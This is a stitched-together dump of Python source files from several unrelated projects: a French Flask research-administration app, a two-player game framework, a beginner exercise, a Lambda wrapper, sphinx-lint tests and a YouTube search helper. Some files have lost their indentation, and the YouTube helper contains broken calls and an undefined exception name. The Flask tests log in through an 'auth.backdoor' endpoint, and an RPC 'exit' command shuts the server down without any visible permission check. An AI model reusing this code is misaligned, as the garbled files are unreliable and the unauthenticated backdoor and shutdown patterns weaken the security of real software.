def deactivate_users(deleted_uids):
logger.info("To be deactivated:", deleted_uids=deleted_uids)
for uid in tqdm(deleted_uids, disable=None):
user = profile_repo.get_by_uid(uid)
user.deactivate()
def update_profile_from_record(profile: Profile, record: LdifRecord):
assert profile
profile.nom = record.sn
profile.prenom = record.givenName
profile.uid = record.uid
profile.email = record.mail
profile.telephone = record.telephoneNumber
profile.adresse = record.address
profile.login = record.supannAliasLogin
profile.adresse = record.adresse
affectation = record.affectation
if not affectation:
if profile.active:
profile.affectation = ""
profile.deactivate()
return
if not profile.active:
profile.activate()
if profile.affectation != affectation:
profile.affectation = affectation
fonctions = list(record.fonctions)
if set(profile.fonctions) != set(fonctions):
profile.fonctions = fonctions
```
#### File: labster/ldap/roles.py
```python
from __future__ import annotations
from tqdm import tqdm
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileRepository
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.roles import Role, RoleService
class RolesUpdater:
def __init__(self):
self.profile_repo = injector.get(ProfileRepository)
self.structure_repo = injector.get(StructureRepository)
self.role_service = injector.get(RoleService)
def update_roles(self, max=0):
profiles = self.profile_repo.get_all()
print("nbre de profils", len(profiles))
if max:
profiles = list(profiles)[0:max]
for profile in tqdm(profiles, disable=None):
if not profile.active:
continue
self.update_roles_for(profile)
def update_roles_for(self, user: Profile):
self.update_role_membre_affecte(user)
self.role_service.update_roles(user)
# TODO
# self.update_role_porteur(user)
def update_role_membre_affecte(self, user: Profile):
roles = self.role_service.get_roles_for_user(user)
structures_actuelles = list(roles.get(Role.MEMBRE_AFFECTE, []))
if (
len(structures_actuelles) == 1
and structures_actuelles[0].dn == user.affectation
):
return
for structure in structures_actuelles:
self.role_service.ungrant_role(user, Role.MEMBRE_AFFECTE, structure)
structure = self.structure_repo.get_by_dn(user.affectation)
if structure:
self.role_service.grant_role(user, Role.MEMBRE_AFFECTE, structure)
# def update_role_porteur(self, user: Profile):
# if "researcher" in user.fonctions or "faculty" in user.fonctions:
# self.remove_role_porteur(user)
# structure = self.structure_repository.get_by_dn(user.affectation)
# self.role_service.grant_role(user, Role.PORTEUR, structure)
#
# else:
# self.remove_role_porteur(user)
#
# def remove_role_porteur(self, user: Profile):
# roles = self.role_service.get_roles_for_user(user)
# structures = roles.get(Role.PORTEUR, [])
# for structure in structures:
# self.role_service.ungrant_role(user, Role.PORTEUR, structure)
```
#### File: src/labster/menu.py
```python
from __future__ import annotations
from labster.domain2.services.roles import Role
from labster.lib.menu import Menu
from labster.rbac import can_view_stats
MAIN = {
"label": "Menu principal",
"entries": [
# Homes
{"label": "Accueil", "to": "/", "icon": "home"},
{
"label": "Tâches",
"to": "/tasks",
"icon": "check-square",
},
{
"label": "Mes demandes en cours",
"to": "/demandes",
"icon": "briefcase",
},
{
"label": "Demandes archivées",
"to": "/archives",
"icon": "graduation-cap",
},
# Stuff
{"label": "Questions & suggestions", "to": "/faq", "icon": "question"},
{
"label": "Statistiques",
"to": "/bi",
"icon": "chart-line",
"precondition": can_view_stats,
},
{
"label": 'Calculette "devis RH"',
"to": "/calculette_rh",
"icon": "calculator",
},
{
"label": 'Calculette "feuille de coûts"',
"endpoint": "main.calculette_feuille_cout",
"icon": "calculator",
},
],
}
ANNUAIRES = {
"label": "Annuaires",
"entries": [
{"label": "Structures", "to": "/annuaire/structures", "icon": "sitemap"},
{"label": "Utilisateurs", "to": "/annuaire/users", "icon": "user"},
{
"label": "Contacts Lab&Co",
"to": "/contacts",
"icon": "arrows-alt",
"requires_role": {"alc"},
},
],
}
ADMIN = {
"label": "Administration",
"entries": [
# {"label": "Home", "icon": "home", "requires_role": {"alc"},},
# {"label": "Tableau de bord", "icon": "chart-line", "requires_role": {"alc"},},
{
"label": "Gérer la FAQ",
"icon": "question",
"to": "/admin/faq",
"requires_role": {Role.ADMIN_CENTRAL, Role.FAQ_EDITOR},
},
{
"label": "Config",
"icon": "sliders-h",
"to": "/admin/constants",
"requires_role": {"alc"},
},
{
"label": "Rôles globaux",
"icon": "lock",
"to": "/admin/roles",
"requires_role": {"alc"},
},
# {
# "label": "Financeurs",
# "icon": "euro-sign",
# # "endpoint": "admin2.financeurs",
# "requires_role": {"alc"},
# },
],
}
def get_menu(user):
menus = [Menu(MAIN), Menu(ANNUAIRES), Menu(ADMIN)]
return [m for m in menus if not m.is_empty()]
```
#### File: newforms/base/fields.py
```python
from __future__ import annotations
import uuid
from typing import List
from flask_babel import format_date
from labster.domain.models.profiles import Profile
from labster.domain.models.util import parse_date
from labster.types import JSONDict
class Field:
required = False
visible = True
hidden = False
editable = True
scalar = True
note = ""
specs: List[List[str]] = []
def __init__(self, name, label, **kw):
self.name = name
self.label = label
for k, v in kw.items():
setattr(self, k, v)
def to_dict(self) -> JSONDict:
return {
"name": self.name,
"type": self.__class__.__name__,
"scalar": self.scalar,
"label": self.label,
"required": self.required,
"visible": self.visible,
"hidden": self.hidden,
"editable": self.editable,
"note": self.note,
"specs": self.specs,
}
def get_display_value(self, demande) -> str:
"""Return the name of this field for display in the form."""
if self.name == "porteur":
# get a Profile object, so than we get the full_name below
# and not just its uid.
value = demande.porteur
else:
value = demande.data.get(self.name, "")
if value in (None, "None"):
value = ""
elif value is False:
value = "Non"
elif value is True:
value = "Oui"
elif isinstance(value, Profile):
value = value.full_name
return str(value)
class StringField(Field):
pass
class DateField(Field):
def get_display_value(self, demande):
value = demande.data.get(self.name, "")
date_value = parse_date(value)
if not value:
return ""
return format_date(date_value, format="medium")
class IntegerField(Field):
pass
class EmailField(Field):
pass
class BooleanField(Field):
pass
class Boolean2Field(Field):
pass
class TriStateField(Field):
pass
# def make_choices(l: List[str]):
# return [{"value": x, "label": x} for x in l]
class Select2Field(Field):
choices: List[str] = []
def to_dict(self) -> JSONDict:
d = Field.to_dict(self)
if callable(self.choices):
choices = self.choices()
else:
choices = self.choices
d["choices"] = choices
return d
# if choices and isinstance(choices[0], str):
# d["choices"] = make_choices(choices)
# else:
# d["choices"] = choices
# return d
class MultipleSelect2Field(Field):
choices: List[str] = []
def to_dict(self) -> JSONDict:
d = Field.to_dict(self)
if callable(self.choices):
choices = self.choices()
else:
choices = self.choices
d["choices"] = choices
return d
class TextAreaField(Field):
pass
class HTML(Field):
editable = False
def __init__(self, text, name=""):
if not name:
name = "html-" + uuid.uuid4().hex
super().__init__(name, text)
class ListField(Field):
scalar = False
class ListePartenaires(ListField):
specs = [
["nom_partenaire", "Nom du partenaire"],
["prenom_nom_contact", "Contact"],
["mail_contact", "Email"],
["telephone_contact", "Téléphone"],
]
class ListePartenairesContactes(ListField):
specs = [
["contact", "Contact"],
["nom_partenaire", "Nom du partenaire"],
]
class ListeDivulgationsPassees(ListField):
specs = [
["type_divulgation", "Type de divulgation"],
["titre", "Titre"],
["date_lieu", "Date et lieu"],
]
class ListeDivulgationsFutures(ListField):
specs = [
["type_divulgation", "Type de divulgation"],
["date", "Date envisagée"],
]
class ListeContrats(ListField):
specs = [
["contrat", "Contrat/Partenariat de recherche"],
["date_signature", "Date de signature du contrat"],
["reference", "Référence du contrat"],
]
class ListeMateriels(ListField):
specs = [
["materiel", "Matériel"],
]
class ListeAutresDeclarations(ListField):
specs = [
["type_protection", "Type de protection"],
["organisme", "Organisme ayant fait le dépôt"],
["exploitation", "Exploitation industrielle"],
]
class ListeLicencesExistantes(ListField):
specs = [
["type_licence", "Type de la licence"],
["nom_version_licence", "Nom et version de la licence"],
]
class FieldSet:
def __init__(self, name, label, fields):
self.name = name
self.label = label
self.fields = fields
self.visible = True
self.hidden = False
def to_dict(self) -> JSONDict:
return {
"name": self.name,
"type": [self.__class__.__name__],
"label": self.label,
"fields": [field.name for field in self.fields],
"visible": self.visible,
"hidden": self.hidden,
}
def __repr__(self):
return f"<FieldSet name={self.name} visible={self.visible}>"
```
#### File: rpc/commands/constants.py
```python
from __future__ import annotations
from flask_sqlalchemy import SQLAlchemy
from jsonrpcserver import method
from werkzeug.exceptions import BadRequest
from labster.di import injector
from labster.domain2.services.constants import save_constants
db = injector.get(SQLAlchemy)
@method
def update_constants(constants):
if not constants:
raise BadRequest()
save_constants(constants)
db.session.commit()
```
#### File: rpc/commands/membres.py
```python
from __future__ import annotations
from typing import Dict, List
from flask_sqlalchemy import SQLAlchemy
from jsonrpcserver import method
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileRepository
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.roles import Role, RoleService
from labster.rpc.cache import cache
structure_repo = injector.get(StructureRepository)
profile_repo = injector.get(ProfileRepository)
role_service = injector.get(RoleService)
db = injector.get(SQLAlchemy)
@method
def update_membres_rattaches(structure_id: str, values: List[Dict]):
structure = structure_repo.get_by_id(structure_id)
assert structure
membres: List[Profile] = role_service.get_users_with_given_role(
Role.MEMBRE_RATTACHE, structure
)
current_membre_ids = {m.id for m in membres}
updated_membre_ids = {m["id"] for m in values}
membres_to_add = updated_membre_ids.difference(current_membre_ids)
for user_id in membres_to_add:
user = profile_repo.get_by_id(user_id)
role_service.grant_role(user, Role.MEMBRE_RATTACHE, structure)
membres_to_remove = current_membre_ids.difference(updated_membre_ids)
for user_id in membres_to_remove:
user = profile_repo.get_by_id(user_id)
role_service.ungrant_role(user, Role.MEMBRE_RATTACHE, structure)
db.session.commit()
cache.evict("users")
cache.evict("structures")
```
#### File: rpc/commands/misc.py
```python
from __future__ import annotations
from flask import request
from jsonrpcserver import method
@method
def exit():
func = request.environ.get("werkzeug.server.shutdown")
func()
```
#### File: rpc/commands/workflow.py
```python
from __future__ import annotations
from flask_sqlalchemy import SQLAlchemy
from jsonrpcserver import method
from labster.di import injector
from labster.domain2.model.demande import Demande
from labster.security import get_current_profile
@method
def wf_transition(demande_id, action, data=None):
data = data or {}
user = get_current_profile()
db = injector.get(SQLAlchemy)
demande = db.session.query(Demande).get(demande_id)
workflow = demande.get_workflow(user)
try:
transition = workflow.get_transition_by_id(action)
except IndexError:
msg = (
"Action impossible. Quelqu'un a probablement effectué une action "
"sur la demande en parallèle avec vous.",
"danger",
)
return msg
workflow.execute_transition(transition, data=data)
db.session.commit()
msg = (
f"Votre action '{transition.label}' sur la demande '{demande.nom}' a bien été prise en compte.",
"success",
)
return msg
# @method
# def wf_transition(demande_id, action):
# user = get_current_profile()
# db = injector.get(SQLAlchemy)
#
# form = transition.get_form(workflow)
# for field in form:
# field.form = form
# is_form_valid = form.validate()
#
# if __action == "confirm":
# if is_form_valid:
# data = {}
# for field in form:
# data[field.id] = field.data
# workflow.execute_transition(transition, data=data)
# db.session.commit()
# flash(
# "Votre action '{}' sur la demande '{}' a bien été prise en compte.".format(
# transition.label, demande.nom
# )
# )
# return redirect(url_for(demande, _external=True))
# else:
# flash(
# "Merci de bien vouloir corriger ou compléter les informations "
# "ci-dessous.",
# "danger",
# )
# flash(f"{form.errors}")
#
# title = "Confirmer l'action"
# breadcrumbs = [{"name": "Demandes", "url": url_for(".demandes")}, {"name": title}]
#
# ctx = {
# "title": title,
# "breadcrumbs": breadcrumbs,
# "form": form,
# "transition": transition,
# "demande": demande,
# }
# return render_template("wf/confirm.html", **ctx)
```
#### File: rpc/queries/user.py
```python
from __future__ import annotations
import json
from typing import Any, Dict, List, Optional, Set, Tuple
from werkzeug.exceptions import NotFound
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileId, ProfileRepository
from labster.domain2.model.structure import Structure, StructureRepository
from labster.domain2.model.type_structure import DE, EQ
from labster.domain2.services.contacts import ContactService
from labster.domain2.services.roles import Role, RoleService
from labster.rpc.registry import context_for
from labster.types import JSON, JSONDict
role_service = injector.get(RoleService)
contact_service = injector.get(ContactService)
profile_repo = injector.get(ProfileRepository)
structure_repo = injector.get(StructureRepository)
@context_for("user")
def get_user(id: str) -> JSONDict:
user = profile_repo.get_by_id(ProfileId(id))
if not user:
user = profile_repo.get_by_old_uid(id)
if not user:
raise NotFound()
structure_affectation_dto: JSON
if user.affectation:
structure_affectation = structure_repo.get_by_dn(user.affectation)
if structure_affectation:
structure_affectation_dto = {
"name": structure_affectation.sigle_ou_nom,
"id": structure_affectation.id,
}
else:
structure_affectation_dto = None
else:
structure_affectation_dto = None
user_dto = {}
for k in ["nom", "prenom", "email", "telephone", "uid", "affectation", "login"]:
user_dto[k] = getattr(user, k)
# Cas particulier: fonctions est un set() pas une liste.
if isinstance(user.fonctions, str):
fonctions = json.loads(user.fonctions)
else:
fonctions = user.fonctions
user_dto["fonctions"] = sorted(fonctions)
roles_dto = get_roles_dto_for_user(user, skip=True)
perimetre_dto = get_perimetre_dto_for_user(user)
ctx = {
"name": user.full_name,
"user": user_dto,
"structure_affectation": structure_affectation_dto,
"roles": roles_dto,
"perimetre": perimetre_dto,
}
return ctx
#
# Serialization helpers
#
def get_roles_dto_for_user(
user: Profile, base_structure: Optional[Structure] = None, skip: bool = False
) -> List[Dict[str, Any]]:
roles_for_user = role_service.get_roles_for_user(user)
all_structures = {}
for contexts in roles_for_user.values():
for context in contexts:
if not context:
continue
assert isinstance(context, Structure)
all_structures[context.id] = context
list_structures = list(all_structures.values())
list_structures.sort(key=lambda s: s.depth)
ancestors: Set[Structure]
if base_structure:
ancestors = set(base_structure.ancestors)
else:
ancestors = set()
def get_roles_list(structure):
role_list: List[str] = []
for role, structures in roles_for_user.items():
if role == Role.MEMBRE:
continue
if structure in ancestors:
continue
if (
skip
and role == Role.MEMBRE_AFFILIE
and structure.type_name != "Département"
):
continue
if structure in structures:
role_list.append(role.value)
role_set = set(role_list)
if Role.MEMBRE_AFFECTE.value in role_set:
role_set.discard(Role.MEMBRE_AFFILIE.value)
role_list = list(role_set)
role_list.sort()
return role_list
roles_dto = []
for structure in list_structures:
role_list = get_roles_list(structure)
if not role_list:
continue
dto = {
"structure": {
"name": structure.sigle_ou_nom,
"type": structure.type_name,
"reelle": structure.is_reelle,
"id": structure.id,
"depth": structure.depth,
},
"roles": role_list,
}
roles_dto.append(dto)
def sorter(dto) -> Tuple[int, int]:
structure = dto["structure"]
depth = structure["depth"]
if set(dto["roles"]) & {
Role.MEMBRE_AFFECTE.value,
Role.MEMBRE_RATTACHE.value,
Role.MEMBRE_AFFILIE.value,
Role.MEMBRE.value,
Role.PORTEUR.value,
Role.SIGNATAIRE.value,
Role.RESPONSABLE.value,
}:
if structure["reelle"]:
return (1, depth)
if structure["type"] in {EQ.name, DE.name}:
return (2, depth)
return (3, depth)
if dto["roles"] == Role.GESTIONNAIRE.value:
return (4, depth)
if dto["roles"] == Role.ADMIN_LOCAL.value:
return (5, depth)
return (6, depth)
roles_dto.sort(key=sorter)
return roles_dto
def get_perimetre_dto_for_user(user) -> List[Dict[str, Any]]:
mapping = contact_service.get_mapping()
result = []
for structure, d in mapping.items():
for contact_type, profile in d.items():
if profile == user:
structure_dto = {
"name": structure.sigle_ou_nom,
"id": structure.id,
"type": structure.type_name,
"depth": structure.depth,
}
dto = {"structure": structure_dto, "types": [contact_type.value]}
result.append(dto)
return result
```
#### File: rpc/tests/test_roles.py
```python
from __future__ import annotations
from glom import glom
from pytest import mark
from labster.domain2.model.profile import Profile
from labster.domain2.model.structure import Structure
from labster.domain2.model.type_structure import UN
from labster.domain2.services.roles import Role
from labster.rpc.commands.roles import add_roles, delete_role
from labster.rpc.queries.roles import get_role_selectors, get_roles
@mark.skip
def test_roles(structure_repo, profile_repo):
universite = Structure(nom="SU", type_name=UN.name)
structure_repo.put(universite)
user = Profile(uid="toto")
profile_repo.put(user)
result = get_roles(universite.id)
assert glom(result, (["users"], [["id"]])) == [[], [], [], [], []]
add_roles(universite.id, [user.id], Role.PORTEUR.name)
result = get_roles(universite.id)
assert glom(result, (["users"], [["id"]])) == [[], [], [], [], [user.id]]
delete_role(universite.id, user.id, Role.PORTEUR.name)
result = get_roles(universite.id)
assert glom(result, (["users"], [["id"]])) == [[], [], [], [], []]
result = get_role_selectors(universite.id)
# First select is not multiple
assert glom(result, ["value"]) == [None, [], [], [], []]
```
#### File: labster/test/test_web.py
```python
from __future__ import annotations
import os
import uuid
import pytest
from flask import url_for
from labster.di import injector
from labster.domain2.model.structure import Structure, StructureRepository
from labster.domain2.model.type_structure import UN
from labster.domain.models.profiles import Profile
from labster.domain.models.unites import LABORATOIRE, OrgUnit
from labster.domain.services.roles import ROLES
IGNORED_ENDPOINTS = ["auth.callback", "auth.backdoor"]
# FIXME
if os.environ.get("TRAVIS"):
pytest.skip("These tests currently fail on Travis", allow_module_level=True)
pytest.skip(
"These tests currently fail since recent refactoring", allow_module_level=True
)
structure_repo = injector.get(StructureRepository)
#
# 'auth' blueprint
#
def test_login(client, db_session):
r = client.get(url_for("auth.login"))
assert r.status_code == 200
#
# 'main' blueprint
#
def test_home_as_anonymous(client, db_session):
r = client.get(url_for("main.home"))
assert r.status_code == 302
def test_home_as_dgrtt(client, db_session):
login_as_dgrtt(client, db_session)
r = client.get(url_for("main.home"), follow_redirects=True)
assert r.status_code == 200
def test_home_as_gdl(client, db_session):
login_as_gdl(client, db_session)
r = client.get(url_for("main.home"), follow_redirects=True)
assert r.status_code == 200
#
#
#
def test_url_for(app, db_session):
assert url_for("main.home") == "http://localhost.localdomain/"
p = Profile(uid="ayuso", nom="Ayuso", prenom="Sandrine", email="<EMAIL>")
assert url_for(p)
dn = f"test{uuid.uuid4()}"
nom = f"nom{uuid.uuid4()}"
labo = OrgUnit(type=LABORATOIRE, dn=dn, nom=nom)
assert url_for(labo)
# TODO: remove soon
# def test_directory(client, db_session):
# login_as_dgrtt(client, db_session)
# r = client.get(url_for("directory.home"))
# assert r.status_code == 200
#
# login_as_gdl(client, db_session)
# r = client.get(url_for("main.home"), follow_redirects=True)
# assert r.status_code == 200
#
#
# def xxx_test_nouvelle_demande_rh(client, db_session):
# login_as_gdl(client, db_session)
#
# r = client.get(url_for("demandes.demande_new"))
# assert r.status_code == 200
#
# data = {"prenom": "Snake", "nom": "Plisken"}
# r = client.post(
# url_for("demandes.demande_new_post"), data=data, follow_redirects=True
# )
# assert r.status_code == 200
# assert "<NAME>" in r.get_data(as_text=True)
#
# # debug_info = get_debug_info(r)
# # url = debug_info['url']
#
# r = client.get(url_for("demandes.demandes"), follow_redirects=True)
# assert r.status_code == 200
# assert "<NAME>" in r.get_data(as_text=True)
#
#
# #
# # Admin
# #
# def test_admin_views(client, db_session):
# login_as_dgrtt(client, db_session)
#
# r = client.get(url_for("admin2.home"))
# assert r.status_code == 200
#
# r = client.get(url_for("admin2.financeurs"))
# assert r.status_code == 200
#
# r = client.get(url_for("admin2.mapping_dgrtt"))
# assert r.status_code == 200
#
# All...
#
@pytest.mark.parametrize("role", ROLES)
def test_all_simple_endpoints(role, client, app, db_session):
# Setup repo with a root
structure_repo.clear()
universite = Structure(
nom="Sorbonne Université",
type_name=UN.name,
sigle="SU",
dn="ou=SU,ou=Affectations,dc=chapeau,dc=fr",
)
structure_repo.put(universite)
login_as_dgrtt(client, db_session)
Profile.__roles = [role]
endpoints = get_endpoints(app)
try:
for endpoint in endpoints:
print(f"checking endpoint '{endpoint}' with role '{role}'")
check_endpoint(endpoint, client)
finally:
del Profile.__roles
structure_repo.clear()
def get_endpoints(app):
endpoints = []
for rule in app.url_map.iter_rules():
if "GET" not in rule.methods:
continue
endpoint = rule.endpoint
blueprint_name = endpoint.split(".")[0]
# Skip a few hard cases (FIXME after the SPA migration)
if blueprint_name not in {"auth", "v3"}:
continue
# if blueprint_name not in ["main", "admin2"]:
# return
if endpoint in IGNORED_ENDPOINTS:
continue
if rule.arguments:
continue
endpoints.append(rule.endpoint)
return endpoints
def check_endpoint(endpoint, client):
url = url_for(endpoint)
try:
r = client.get(url)
except Exception:
print(f"Error on url: {url} (endpoint: {endpoint})")
raise
assert r.status_code in (200, 302, 401, 403), f"for endpoint = '{endpoint}'"
#
# Util
#
def login_as_dgrtt(client, db_session):
p = Profile(uid="ayuso", nom="Ayuso", prenom="Sandrine", email="<EMAIL>")
p.__roles = ["alc", "dgrtt"]
db_session.add(p)
db_session.flush()
login_as(p, client)
def login_as_gdl(client, db_session):
dn = f"test{uuid.uuid4()}"
nom = f"nom{uuid.uuid4()}"
labo = OrgUnit(type=LABORATOIRE, dn=dn, nom=nom)
p = Profile(
uid="courtoisi",
nom="Courtois",
prenom="Isabelle",
email="<EMAIL>",
laboratoire=labo,
)
db_session.add(p)
db_session.flush()
id = p.id
p1 = Profile.query.get(id)
assert p1 is p
login_as(p, client)
def login_as(profile: Profile, client):
uid = profile.uid
r = client.get(url_for("auth.backdoor", uid=uid))
assert r.status_code == 201
r = client.get(url_for("v3.self"))
assert r.status_code == 200
assert r.json["data"]["uid"] == uid
```
|
{
"source": "jean3108/TwoPlayer-Game",
"score": 4
}
|
#### File: TwoPlayer-Game/twoPlayerAiGame/stateGame.py
```python
from abc import ABC, abstractmethod
from twoPlayerAiGame.aiAlgorithms import minmaxDecision, negamaxDecision, randomDecision, humanDecision
class StateGame(ABC):
"""
Class wich represent a state of a two-player game
"""
@abstractmethod
def __init__(self, maxPlayer):
"""
Create a state of the game.
:return: The state with the choosen information
:rtype: stateGame
"""
self.maxPlayer = 1 if maxPlayer==True else -1
pass
@abstractmethod
def calculateScore(self):
"""
Calculate the score of the current state if it's a terminal state or estimate the score
:return: The score of the current state
:rtype: number
"""
pass
@abstractmethod
def getChoices(self):
"""
Get the different choice for the player for the current state.
:return: Every choices that the player can make.
:rtype: list[object]
"""
pass
@abstractmethod
def doChoice(self, inNewState = False):
"""
Apply the choice to the current state (inplace or not)
:param inNewState: To choose if the choice is apply inplace (on the current state) or not (on a copy of the current state)
:type inNewState: boolean
:return: Nothing if it's inplace then the new state.
:rtype: stateGame or None
"""
pass
@abstractmethod
def undoChoice(self, inNewState = False):
"""
Undo the given choice for the current state (inplace or not)
:param inNewState: To choose if the choice is apply inplace (on the current state) or not (on a copy of the current state)
:type inNewState: boolean
:return: Nothing if it's inplace then the new state.
:rtype: stateGame or None
"""
pass
@abstractmethod
def toKey(self):
"""
Get the unique ID of the state.
This ID is useful to use memoization in different algorithms
:return: the ID of the current state
:rtype: string
"""
pass
@abstractmethod
def printBeforeGame(self):
"""
Print information before the beginning of the game
"""
pass
@abstractmethod
def printInfoPlayer(self):
"""
Print information before the turn of the current player
"""
pass
@abstractmethod
def printResultAction(self, choice):
"""
Print information after the turn of the current player
:param choice: The choice wich was just played
:type choice: typeof(self.getChoices()[0])
"""
pass
@abstractmethod
def printAfterGame(self):
"""
Print information after the end of the game
"""
pass
def play(self, player1, player2, verbose=True):
"""
Play the game
:param player1: String to choose the algorithm for the choice of the player1 (can be human)
:param player2: String to choose the algorithm for the choice of the player2 (can be human)
:param verbose: Indicate if information are printed or not
:type player1: String
:type player2: String
:type verbose: boolean
:return: the number of the winner then 0
:rtype: int
"""
####################################
# Selection of algorithm & Setting #
####################################
if(player1=='human'):
function1 = humanDecision
elif(player1=='minmax'):
function1 = minmaxDecision
elif(player1=='negamax'):
function1 = negamaxDecision
elif(player1=='random'):
function1 = randomDecision
if(player2=='human'):
function2 = humanDecision
elif(player2=='minmax'):
function2 = minmaxDecision
elif(player2=='negamax'):
function2 = negamaxDecision
elif(player2=='random'):
function2 = randomDecision
#########################
# Beginning of the game #
#########################
over = False
if(verbose==True):
self.printBeforeGame()
currentScore = self.calculateScore()
while(currentScore==False):
if(verbose==True):
self.printInfoPlayer()
if(self.maxPlayer==1):
choice = function1(self)[1]
else:
choice = function2(self)[1]
self.doChoice(choice)
currentScore = self.calculateScore()
if(verbose==True):
self.printResultAction(choice)
if(verbose==True):
self.printAfterGame()
return currentScore
```
|
{
"source": "Jean-6/python",
"score": 3
}
|
#### File: Jean-6/python/tp2-table.py
```python
import time
import random
import time
table=[1,2,3,4,5,2,1,11,32,20]
var = 1;
def to_calculate_average(table):
total=0;
moy=0;
for item in table:
total=total+item;
moy=total/len(table);
return moy;
def occurrence_number(table,elt):
count=0;
for item in table:
if elt==item :
count=count+1;
return count;
def number_of_elements_up_or_equals_to_ten(table):
count =0;
for item in table:
if item >=10:
count=count+1;
return count;
def research_max_value(table):
max=table[0];
for item in table :
if max<item:
max=item;
return max;
def test_element_existing(table,elt):
check=False;
for item in table:
if elt==item:
check=True;
return check;
def to_generate_table(n):
newTable=[];
count=0;
while count<n :
newTable.append(random.randint(0,10));
count=count+1;
random.shuffle(newTable);
return newTable;
print("Average :",to_calculate_average(table));
print("Occurrence number of {} in table : {}".format(var,occurrence_number(table,var)));
print("Number of elements up or equals to ten : {}".format(number_of_elements_up_or_equals_to_ten(table)));
print("Max value is : {}".format(research_max_value(table)));
print("{} exists in table : {} ".format(var,test_element_existing(table,var)));
t1=time.process_time();
print("Table generated : {}".format( to_generate_table(100)));
t2=time.process_time();
print("Executing time : {}".format(t2-t1),"sec.");
```
|
{
"source": "jean9208/pychromeless",
"score": 3
}
|
#### File: pychromeless/src/lambda_function.py
```python
from autocompara_lambda import cotizar
def lambda_handler(*args, **kwargs):
#tipo = args[0]
#year = args[1]
#version = args[2]
#cp = args[3]
tipo = 'AUTO'
year = '2021'
version = 'YARIS S HB CVT 1.5L 4CIL'
cp = '55717'
output = cotizar(tipo, year, version, cp)
return(output)
```
|
{
"source": "Jean-Abou-Samra/sphinx-lint",
"score": 2
}
|
#### File: sphinx-lint/tests/test_sphinxlint.py
```python
from pathlib import Path
import pytest
from sphinxlint import main
FIXTURE_DIR = Path(__file__).resolve().parent / "fixtures"
@pytest.mark.parametrize("file", [str(f) for f in (FIXTURE_DIR / "xpass").glob("*.*")])
def test_sphinxlint_shall_pass(file, capsys):
try:
main(["sphinxlint.py", str(file)])
except SystemExit as err:
error_count = err.code
out, err = capsys.readouterr()
assert out == "No problems found.\n"
assert err == ""
assert error_count == 0
@pytest.mark.parametrize("file", [str(f) for f in (FIXTURE_DIR / "xfail").glob("*.*")])
def test_sphinxlint_shall_not_pass(file, capsys):
try:
main(["sphinxlint.py", str(file)])
except SystemExit as err:
error_count = err.code
out, err = capsys.readouterr()
assert out != "No problems found.\n"
assert err == ""
assert error_count > 0
```
|
{
"source": "JeanAEckelberg/Doc",
"score": 3
}
|
#### File: Doc/server/youtube_utils.py
```python
from apiclient.discovery import build
from apiclient.errors import HttpError
from oauth2client.tools import argparser
from io import *
import json
DEVELOPER_KEY = "<KEY>"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
def search(query):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
videos = []
channels = []
playlists = []
saved_video = False;
# Get related json file
try:
with open(query[0].upper()+'.json', 'r') as read_file:
data = json.load(read_file)
# Check query against data
for item in data:
if query.upper() == item['query']:
saved_video = True;
item['query'] = ""
videos.append(item)
except JSONDecodeError:
pass
# Check to see if the query passed is a direct link
if 'https://www.youtube.com/watch?v=' in query:
#Get unique video id from link
video_id = query.split('=')[1]
videos.append({
"query": "",
"title": "Direct Url Request",
"id": video_id,
"uploader": "Direct Url Request",
"description": "Direct Url Request",
"thumbnail": "https://static.wikia.nocookie.net/pokemon/images/d/d6/Jessie_Mimikyu.png/revision/latest?cb=20170915045921",
"url": query,
"autoplay_url": query + "?autoplay=1"
})
elif saved_video == True:
pass
else:
search_response = youtube.search().list(
q=query,
part="id,snippet",
maxResults=50
).execute()
# Add each result to the appropriate list, and then display the lists of
# matching videos, channels, and playlists.
for search_result in search_response.get("items", []):
if search_result["id"]["kind"] == "youtube#video":
videos.append({
"query": query.upper(),
"title": search_result["snippet"]["title"],
"id": search_result["id"]["videoId"],
"uploader": search_result["snippet"]["channelTitle"],
"description": search_result["snippet"]["description"],
"thumbnail": search_result["snippet"]["thumbnails"]["high"],
"url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"],
"autoplay_url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"] + "?autoplay=1"
})
return videos
def search_related_videos(video_id):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
search_response = youtube.search().list(
part="id,snippet",
relatedToVideoId=video_id,
maxResults=50,
type="video"
).execute()
videos = []
channels = []
playlists = []
# Add each result to the appropriate list, and then display the lists of
# matching videos, channels, and playlists.
for search_result in search_response.get("items", []):
if search_result["id"]["kind"] == "youtube#video":
videos.append({
"title": search_result["snippet"]["title"],
"id": search_result["id"]["videoId"],
"uploader": search_result["snippet"]["channelTitle"],
"description": search_result["snippet"]["description"],
"thumbnail": search_result["snippet"]["thumbnails"]["high"],
"url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"],
"autoplay_url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"] + "?autoplay=1"
})
return videos
def get_video(yt_id, query):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
response = youtube.videos().list(
part="id,snippet,contentDetails",
id=yt_id
).execute()
#print(response)
response = response.get("items", [None])[0]
if not response:
return None
video = {
"query": query.upper(),
"title": response["snippet"]["title"],
"id": response["id"],
"uploader": response["snippet"]["channelTitle"],
"description": response["snippet"]["description"],
"thumbnail": response["snippet"]["thumbnails"]["high"],
"url": "https://www.youtube.com/embed/" + response["id"],
"autoplay_url": "https://www.youtube.com/embed/" + response["id"] + "?autoplay=1",
"duration": response["contentDetails"]["duration"]
}
#TODO: Implement save video to json here
if video['query'] != "":
with open(query[0].upper()+'.json', 'w+') as data_file:
json.dump(video)
#print(video)
else:
pass
return video
```
|
{
"source": "jean-andre-gauthier/findsong",
"score": 3
}
|
#### File: scripts/plots/create_audio_filter_plots.py
```python
from argparse import ArgumentParser
import matplotlib
matplotlib.use("Agg")
from itertools import groupby
import matplotlib.pyplot as plt
import numpy as np
from os import path
def main():
parser = ArgumentParser()
parser.add_argument(
